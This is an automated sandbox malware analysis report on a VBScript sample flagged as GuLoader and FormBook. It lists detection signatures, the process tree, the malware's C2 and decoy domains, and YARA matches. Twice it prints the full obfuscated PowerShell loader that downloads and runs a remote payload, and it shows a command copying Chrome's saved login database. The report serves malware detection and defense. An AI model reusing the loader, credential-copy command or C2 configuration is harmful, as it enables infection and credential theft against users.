Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
birectangular.vbs

Overview

General Information

Sample name:birectangular.vbs
Analysis ID:1466597
MD5:be6f44242b4afd0e61d775b9ef7946b0
SHA1:80ce71becc7fb1203a43708d7e3fdcad778bb79e
SHA256:8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59
Tags:vbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Browser Data Stealing
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4040 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 5680 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7684 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7748 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7836 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7976 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
            • raserver.exe (PID: 3964 cmdline: "C:\Windows\SysWOW64\raserver.exe" MD5: D1053D114847677185F248FF98C3F255)
              • cmd.exe (PID: 7452 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • firefox.exe (PID: 1748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
            • wab.exe (PID: 576 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
            • wab.exe (PID: 2156 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 1516 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
{"C2 list": ["www.x6hk8.com/dd01/"], "decoy": ["1prostitutki-chelyabinska.com", "o2v7c.rest", "something-organized.com", "etc99.store", "perksaccess.contact", "consuyt.xyz", "dscmodelpapers.com", "dana88.lat", "dumange.com", "pointlomabarreboutique.com", "djtmaga.net", "dentisttanger.com", "17251604.com", "dogcatshoponline.com", "eppgrandeur.com", "jyty3500.com", "felixkang.asia", "xn--22ck2ci1dl0f7b7h.com", "milliesrecruitment.com", "www333804000.com", "g90luv.vip", "glamourverde.store", "tzbgs.com", "alpha-wealth.club", "homestreamztv.com", "alignedinvestment.com", "ragwash.com", "ultrakan.xyz", "clearconceptslearning.com", "explorewithnor.com", "d-b-d.com", "saltdrink.com", "55957462.com", "limbicmindset.com", "baldomerotienda.com", "yh-9.xyz", "easyskinz.xyz", "lovefulmindfulness.com", "030303-11122222.cloud", "sunpulse.store", "rescapital.world", "payizadlt.com", "cindcxyshirts.shop", "vnddq.biz", "pvywgx235i.top", "www708cc.vip", "poa88koi.lol", "aseasyas1234inc.net", "ygudk.biz", "tmdirtbikes.com", "bqzprvkljhwtmnxy.net", "qk09.top", "aiatlant.com", "zayinvest.com", "intermediafx.com", "lemonlight.fun", "eurovisfilo.com", "bluefrazer.com", "835000suns.com", "checkonly.net", "bs2bestat.net", "praywithus.space", "huafu.site", "radleyhealth.com"]}
SourceRuleDescriptionAuthorStrings
00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_772cc62dunknownunknown
  • 0xb02:$a2: pass
  • 0xb08:$a3: email
  • 0xb0f:$a4: login
  • 0xb16:$a5: signin
  • 0xb27:$a6: persistent
  • 0xcfa:$r1: C:\Users\user\AppData\Roaming\834O80R0\834log.ini
00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries
      SourceRuleDescriptionAuthorStrings
      amsi64_7428.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi32_7748.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe325:$b2: ::FromBase64String(
        • 0xd3aa:$s1: -join
        • 0x6b56:$s4: +=
        • 0x6c18:$s4: +=
        • 0xae3f:$s4: +=
        • 0xcf5c:$s4: +=
        • 0xd246:$s4: +=
        • 0xd38c:$s4: +=
        • 0x17050:$s4: +=
        • 0x170d0:$s4: +=
        • 0x17196:$s4: +=
        • 0x17216:$s4: +=
        • 0x173ec:$s4: +=
        • 0x17470:$s4: +=
        • 0xdbc8:$e4: Get-WmiObject
        • 0xddb7:$e4: Get-Process
        • 0xde0f:$e4: Start-Process
        • 0x17d27:$e4: Get-Process

        System Summary

        barindex
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs", ProcessId: 4040, ProcessName: wscript.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7976, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4056, ProcessName: explorer.exe
